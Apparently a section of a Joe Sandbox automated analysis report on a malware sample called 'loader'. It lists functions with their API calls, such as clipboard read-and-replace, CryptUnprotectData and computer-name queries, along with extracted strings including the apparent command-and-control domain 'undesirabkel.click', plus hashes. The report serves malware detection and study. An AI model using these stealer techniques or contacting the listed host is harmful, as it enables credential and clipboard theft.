Opcode Fuzzy Hash: 25ea4b00ccdce48133bcba5ba63bc4c06e0c6b83f80ae7ef80eb2208258bdf35
Instruction Fuzzy Hash: 8362DE71A083419BD314CF28D89579BBBE1EFC9314F18892EE5D98B391D778D806CB86

Function 03AA1000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000001), ref: 03AA1032
OpenClipboard.USER32(00000000), ref: 03AA103C
GetClipboardData.USER32(0000000D), ref: 03AA104C
GlobalLock.KERNEL32(00000000), ref: 03AA105D
GlobalAlloc.KERNEL32(00000002,-00000004), ref: 03AA1090
GlobalLock.KERNEL32 ref: 03AA10A0
GlobalUnlock.KERNEL32 ref: 03AA10C1
EmptyClipboard.USER32 ref: 03AA10CB
SetClipboardData.USER32(0000000D), ref: 03AA10D6
GlobalFree.KERNEL32 ref: 03AA10E3
GlobalUnlock.KERNEL32(?), ref: 03AA10ED
CloseClipboard.USER32 ref: 03AA10F3
GetClipboardSequenceNumber.USER32 ref: 03AA10F9

Memory Dump Source

Source File: 00000002.00000002.2934700816.0000000003AA1000.00000020.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: true

Associated: 00000002.00000002.2934688727.0000000003AA0000.00000002.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2934711859.0000000003AA2000.00000002.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3aa0000_loader.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
String ID:
API String ID: 1416286485-0
Opcode ID: 5b5dd7933242f30356b301c0c2e1bb8a89c3e457801c264e033832b718eb0dc5
Instruction ID: 1442a31ef5c6a2a4f8fe925b5f2d4b778995c3eccde7b73e4f1bd1f88ea03cb3
Opcode Fuzzy Hash: 5b5dd7933242f30356b301c0c2e1bb8a89c3e457801c264e033832b718eb0dc5
Instruction Fuzzy Hash: C7219837604A51BBD720BB7AEC0DB6AB7A8FF05741F08082DF945D7154E7618811D7B1

Function 0042FCB0 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 633
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

nzm}, xrefs: 0043035D
WQ%P, xrefs: 00430355
o, xrefs: 004301E5
-!A, xrefs: 0043037F

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: -!A$WQ%P$nzm}$o
API String ID: 0-595633947
Opcode ID: 39f024fdce8eca3aa6935a267eb5072e9f4a8fbc6bcaa137b068aabc11a2728b
Instruction ID: 1373b380c49043cffc0c8925a2035e99e2cfbb7ccbfcbe6adc695ab9f93fb6d5
Opcode Fuzzy Hash: 39f024fdce8eca3aa6935a267eb5072e9f4a8fbc6bcaa137b068aabc11a2728b
Instruction Fuzzy Hash: 0B12D07050C3918BD729CF29C46036BBFE1AFD6304F58896EE4D59B382C7798909CB56

Function 00439A02 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00439A2E

Strings

-, xrefs: 00439A4C
+, xrefs: 00439A5A
*, xrefs: 00439A53
Q, xrefs: 00439A45

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: DefaultLanguageUser
String ID: *$+$-$Q
API String ID: 95929093-785157511
Opcode ID: b042d62ae6667676348fad028f6544a523b44269d66e3574bbfd4f6f4486606a
Instruction ID: c6cfa8010a289e2e649590f2f5895c9c6f8efd22583bca913b9e10c7319df7f5
Opcode Fuzzy Hash: b042d62ae6667676348fad028f6544a523b44269d66e3574bbfd4f6f4486606a
Instruction Fuzzy Hash: 8B417272E046648FCB68CF3CCC953D9BAB1AB49314F1842EEE859E7381DA745E808F44

Function 004089B0 Relevance: 7.8, APIs: 5, Instructions: 286
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004089D4
GetCurrentThreadId.KERNEL32 ref: 004089DE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408A8F
GetForegroundWindow.USER32 ref: 00408AE6
ExitProcess.KERNEL32 ref: 00408D37

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 15a1e9c9ccd5111c19b2a7c98503b6270db70d78381c8d230af2d9ae1c524c28
Instruction ID: 3b4283977abbf2ab0365c36b20981ccf0971cf16026c1c1a38a20da248edae98
Opcode Fuzzy Hash: 15a1e9c9ccd5111c19b2a7c98503b6270db70d78381c8d230af2d9ae1c524c28
Instruction Fuzzy Hash: 199145B2B047044BC3189F798D9635AF6D6AFC4314F0E863DA995DB3E1EA7888058786

Function 0040D973 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 369
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 0040D97F

Strings

i, xrefs: 0040D994
undesirabkel.click, xrefs: 0040DE58
iD, xrefs: 0040DA7E

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: Uninitialize
String ID: i$undesirabkel.click$iD
API String ID: 3861434553-3024081160
Opcode ID: 14003316e3f7599578d8115a7c03e01f91c998b0488bc88d0ff0e6d000fff25b
Instruction ID: 9ced649bd88a07240066c5e31cc611ab42174e8663c952c2e86e4f94a7236f00
Opcode Fuzzy Hash: 14003316e3f7599578d8115a7c03e01f91c998b0488bc88d0ff0e6d000fff25b
Instruction Fuzzy Hash: 04C1F1B25493918FD334CF65C8907DBBBE1ABD6300F0A896DC8D95B381DA790909CB96

Function 00425A91 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 466
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00425AC1

Strings

23, xrefs: 00425EAC

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 23
API String ID: 237503144-326707096
Opcode ID: 9a3146229b57a68851395e4e84867cb2ba553d34ab626c6c80d0cab4eae3aafb
Instruction ID: a071786efabb86fcfd64b1916f4513dfa4523c99be9bd32db1f4f76c909fff59
Opcode Fuzzy Hash: 9a3146229b57a68851395e4e84867cb2ba553d34ab626c6c80d0cab4eae3aafb
Instruction Fuzzy Hash: 0DE1BAB56187409FE310DF65E88162BBBE1EFC6304F88892DE1D58B351E7788906CB5B

Function 00419B52 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 426
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00419E13

Strings

hbty, xrefs: 00419BC2
pz|q, xrefs: 00419BD0

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: hbty$pz|q
API String ID: 834300711-98995051
Opcode ID: c26ce526e0d90f1b8ae54e8112f5567e5eb5954986c5f8c2dab1f710485ec949
Instruction ID: b60a76a49dd391e196a223a2205a20a63bcba479375ac930270acd3d47e42e5d
Opcode Fuzzy Hash: c26ce526e0d90f1b8ae54e8112f5567e5eb5954986c5f8c2dab1f710485ec949
Instruction Fuzzy Hash: F3D13AB16007018FD724CF29D891763BBE2FF55314F188A6DD49A8B792E739E846CB44

Function 0043759A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 004375E8
GetSystemMetrics.USER32 ref: 004375F7

Strings

, xrefs: 004376CB

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: fd9f03126035a2c6b39d9b771c46d4d1a40c76cfe331e6fad6c65bc0150c85b5
Instruction ID: b95fc234e0d18c9c2c6c9f3a748baae0a8728c90c241cff2b5ae1d2fcc8c4eb4
Opcode Fuzzy Hash: fd9f03126035a2c6b39d9b771c46d4d1a40c76cfe331e6fad6c65bc0150c85b5
Instruction Fuzzy Hash: 015183B4E152189FDB40EFACD985A9DBBF0BB49300F01852EE858E7350D734A945CF96

Function 0040AFA0 Relevance: 4.1, Strings: 3, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`a, xrefs: 0040B16A
dk3J, xrefs: 0040B2CD
m}`w, xrefs: 0040B2FC

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: `a$dk3J$m}`w
API String ID: 0-898984084
Opcode ID: 2999d814627f3d4f2fa7e174cedc68f7566228706ccf8123d9458090d0376f5e
Instruction ID: 92376aa91c5e357fbcc4e86c1cc8af42e25d22cc271f649999c83778e06eb699
Opcode Fuzzy Hash: 2999d814627f3d4f2fa7e174cedc68f7566228706ccf8123d9458090d0376f5e
Instruction Fuzzy Hash: 12C1D47550C3508BD314CF24849576FBBE1EFC2708F58886EE8D56B386C7798A0A879B

Function 0040CFC7 Relevance: 2.7, Strings: 2, Instructions: 248COMMON

Download Yara Rule

Strings

undesirabkel.click, xrefs: 0040D3F4
iD, xrefs: 0040D070

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: undesirabkel.click$iD
API String ID: 0-180026756
Opcode ID: 91ce3ecef8b68d4f0df34bf4f21b31f55ade6c8123bea156b71662cdec7d49aa
Instruction ID: 5ca856d92ad126a83bbe09639f513b22a8eb84a9edb5db0aa6105c27943b52c0
Opcode Fuzzy Hash: 91ce3ecef8b68d4f0df34bf4f21b31f55ade6c8123bea156b71662cdec7d49aa
Instruction Fuzzy Hash: 50917AB054C3C18AD375CF24C5957EFBBE0AB96308F148D6DC0DD6B282CB79444A9B9A

Function 0040A2AA Relevance: 2.6, Strings: 2, Instructions: 82COMMON

Download Yara Rule

Strings

KQ, xrefs: 0040A339
_, xrefs: 0040A340

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: KQ$_
API String ID: 0-1544481801
Opcode ID: ff2d8cafc6db592466f0d98acee9dd395ccd6cf94be66b80f566cb465f75f757
Instruction ID: 8be3590de51cb3f13204e0da8b1c8f82d827b007955b663c3e8b61247c6c4c2d
Opcode Fuzzy Hash: ff2d8cafc6db592466f0d98acee9dd395ccd6cf94be66b80f566cb465f75f757
Instruction Fuzzy Hash: 8C21FCB6A50B115BD3048F6DCCC0365BBA1AB96310F19C27CD495A7B85CB7D78419B88

Function 00441AA0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(004449BD,00000002,00000018,?,?,00000018,?,?,?), ref: 00441ACE

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0040A01E Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3b76a2e36b6c68f6e2eb5ece52c634bf9b33ad0ae90104b1d6f885b3939fb80
Instruction ID: 33b851c1ae1f342e98d7c1a4038dc7303cec119cc3e3f8e214ffac10227215e7
Opcode Fuzzy Hash: f3b76a2e36b6c68f6e2eb5ece52c634bf9b33ad0ae90104b1d6f885b3939fb80
Instruction Fuzzy Hash: 1A51E4B0E413548FD714DFA8C95576A7F71EB06704F1A81ACD4806F396D3B1C8068BD6

Function 0042F608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042F635
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042F704

Strings

!"1(, xrefs: 0042F65D

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: !"1(
API String ID: 2904949787-4058720897
Opcode ID: a84ad412ae3e1cbfa91681209596a1ba6c0acbafc3bffa2da94e903604cb3dda
Instruction ID: 2e438bd110f1cac6f495b354c913827fcaffd1c4a7d245e89a5c263b0f7559c8
Opcode Fuzzy Hash: a84ad412ae3e1cbfa91681209596a1ba6c0acbafc3bffa2da94e903604cb3dda
Instruction Fuzzy Hash: D521F7341083D29ECB258F24D4687FBBBE4EB97305F48487ED0C997252CB344509CB55

Function 0042F606 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042F635
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042F704

Strings

!"1(, xrefs: 0042F65D

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: !"1(
API String ID: 2904949787-4058720897
Opcode ID: 8f4e10566f85e670dbd7e787dd3eaf3c672e3d68d7f02b69ab368bec23095bb4
Instruction ID: f10c923f744c9e9fb16a20c80d2526f1fa6460dfbf456a6160d8f3ed3ef1d3d8
Opcode Fuzzy Hash: 8f4e10566f85e670dbd7e787dd3eaf3c672e3d68d7f02b69ab368bec23095bb4
Instruction Fuzzy Hash: 4C2105351092919FC7248F20D869BFBBBE5EB86304F48487DD0CAD7152CB348409CB56

Function 0042F5C2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042F704

Strings

!"1(, xrefs: 0042F65D

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: ComputerName
String ID: !"1(
API String ID: 3545744682-4058720897
Opcode ID: 1f9a00c59e5e879eb35c4eda087fe2beb618e44bfc2c6dc8ca08ac96306e0454
Instruction ID: 02407868c32a142e49c1fff951d5a3358def299e73d93bb5f154d5de68ad48d2
Opcode Fuzzy Hash: 1f9a00c59e5e879eb35c4eda087fe2beb618e44bfc2c6dc8ca08ac96306e0454
Instruction Fuzzy Hash: 271106351093919FC724CF24D869BBBBBE4EB96308F48487EC0CAD7252CB34850ACB56

Function 0042F72A Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042F80F

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 3e78269cc1f628c65f4d0c5d92b07debe3415c622e64807e171a3948fe2c4502
Instruction ID: e6ce04b267faf7464ad878427803358cd88b402f6d7df2c250318083cecd4b2b
Opcode Fuzzy Hash: 3e78269cc1f628c65f4d0c5d92b07debe3415c622e64807e171a3948fe2c4502
Instruction Fuzzy Hash: E721F23560C3D14AD7268F2484617EBBBE5AFD6304F48446EC5C997242C778890ACB96

Function 0042F726 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042F80F

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 2973b701bc626eb7bacba9d0c9febada56a978a9360ba4d7b72cbee541131b56
Instruction ID: 658a34571a9d8a1b048ed98096f4a77c32374fce8eb91868bfa244cf725863b3
Opcode Fuzzy Hash: 2973b701bc626eb7bacba9d0c9febada56a978a9360ba4d7b72cbee541131b56
Instruction Fuzzy Hash: 1C11D63660C3904BD3268F2488617E7BBE1ABD5314F59453EC5C997242C6784905CB96

Function 00442130 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00442189

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: f55c84f0faa60623b92c8a9445f4ace685aa27fd60c866df31196ef6b1247dcb
Instruction ID: 7713887e56ddcb5e61251368c8aecf105f40aadce4b28999bf764736141dd4f4
Opcode Fuzzy Hash: f55c84f0faa60623b92c8a9445f4ace685aa27fd60c866df31196ef6b1247dcb
Instruction Fuzzy Hash: 16012875A144408FEB0CDF34C890AA937F1EB5B305B1C40B9D103E7362D638AA00CF14

Function 00441A42 Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000), ref: 00441A6A

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c902c51b374220b29206d97a8cb6ed1aea4fb6c0d89c55d660559b36c16f2cbe
Instruction ID: c889b3b777994790276d4f6a57cf030df6bc75f855c3f5843cd6d98e00571765
Opcode Fuzzy Hash: c902c51b374220b29206d97a8cb6ed1aea4fb6c0d89c55d660559b36c16f2cbe
Instruction Fuzzy Hash: 0AE02632D9A500EAE3103B397C07B2725249FA3B57F050536F1009407AEE2DC801829F

Function 00434DC8 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00434E0D

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 1a23e27b44c8b4625c345d668319160c305b170b3bb437305f23415ba3cd232c
Instruction ID: 2d940412db10af45a70269ce19384a19a0f652cc87149939fa91a4bb570e828c
Opcode Fuzzy Hash: 1a23e27b44c8b4625c345d668319160c305b170b3bb437305f23415ba3cd232c
Instruction Fuzzy Hash: FAF074B45087068FE314DF68D5A871BBBE0FB85308F11891CE4958B290DBB69948CF82

Function 00432178 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004321C3

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 55b4cbebcd322cb3c6d2a706fc56c2e56046578710a10d9e9a8b36175fe852a5
Instruction ID: 40a1fada103f4286737c00ecb2b40a05757a8343765d31c3259b2b5ec5d1acf5
Opcode Fuzzy Hash: 55b4cbebcd322cb3c6d2a706fc56c2e56046578710a10d9e9a8b36175fe852a5
Instruction Fuzzy Hash: B5F022B45197018FE310DF29D5A871BBBE0BB84344F11991CE4998B390D7B9AA49CF82

Function 0040CF60 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CF73

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 2477893d9250ba8c58df4051f80ce9a2ace3bc47c6915aa8a60a9bad9e74d129
Instruction ID: 6dae3f3c8af8259f7461475d0dc29f5aa55a0ba48c81a6b56b36479c71177b5b
Opcode Fuzzy Hash: 2477893d9250ba8c58df4051f80ce9a2ace3bc47c6915aa8a60a9bad9e74d129
Instruction Fuzzy Hash: DED02E202542006BC348A728EC16F2B329C8703315F00023EB2529A2C2EDA0290082A8

Function 0040CF95 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CFA7

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: bfe0413df39538f3b0cffe762a16f33be40b0849261d6c5140f1eeb8f356ea05
Instruction ID: 4714ec749d1da8ba86703ded21055e332d4ad56394b7da72a92342686646782a
Opcode Fuzzy Hash: bfe0413df39538f3b0cffe762a16f33be40b0849261d6c5140f1eeb8f356ea05
Instruction Fuzzy Hash: 9ED0C9383D830076F6345708AC13F2532115306F15F30062DB323FE6E0C9E07145860C

Function 0043FED0 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,51DD6A77,00415178,00000000), ref: 0043FEF0

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0b6c23a6614fb71b0c6a09d6df633af2038e52fc9137a0124ae1fb6b2ee5daba
Instruction ID: e54997de52b7a5b543a73817e6ed4259d305c3aed6c7cce9df7ef83ef590c6c5
Opcode Fuzzy Hash: 0b6c23a6614fb71b0c6a09d6df633af2038e52fc9137a0124ae1fb6b2ee5daba
Instruction Fuzzy Hash: 13D0C931405622FBC6506F28BC15BE73A549F4A622F0748A1B5446B065D624DC918AD8

Function 0043FEB0 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,00408C4F,222D0C2F), ref: 0043FEC0

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3b55c4b4817f207c803bdf689a07dac8e379342ce86f01420ba0c7d61af9dde8
Instruction ID: 8764fe7512c33803e13e813a7aedc1b42fab2cc8f32088712a77dfc6a0185d69
Opcode Fuzzy Hash: 3b55c4b4817f207c803bdf689a07dac8e379342ce86f01420ba0c7d61af9dde8
Instruction Fuzzy Hash: BEC09B31445220BBD6106F15FC09FD63F54EF45756F554055B10867075C760BC81C6D8

Non-executed Functions

Function 00429D4A Relevance: 19.5, APIs: 2, Strings: 9, Instructions: 271COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429E30
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00429EE5

Strings

fT-@, xrefs: 0042A17C
rHM{, xrefs: 0042A194
#K_c, xrefs: 0042A174
#@A{, xrefs: 0042A19C
23, xrefs: 00429DC6
`PWj, xrefs: 0042A184
7*uu, xrefs: 0042A18C
A, xrefs: 0042A1A4
oXh^, xrefs: 0042A16C

Memory Dump Source

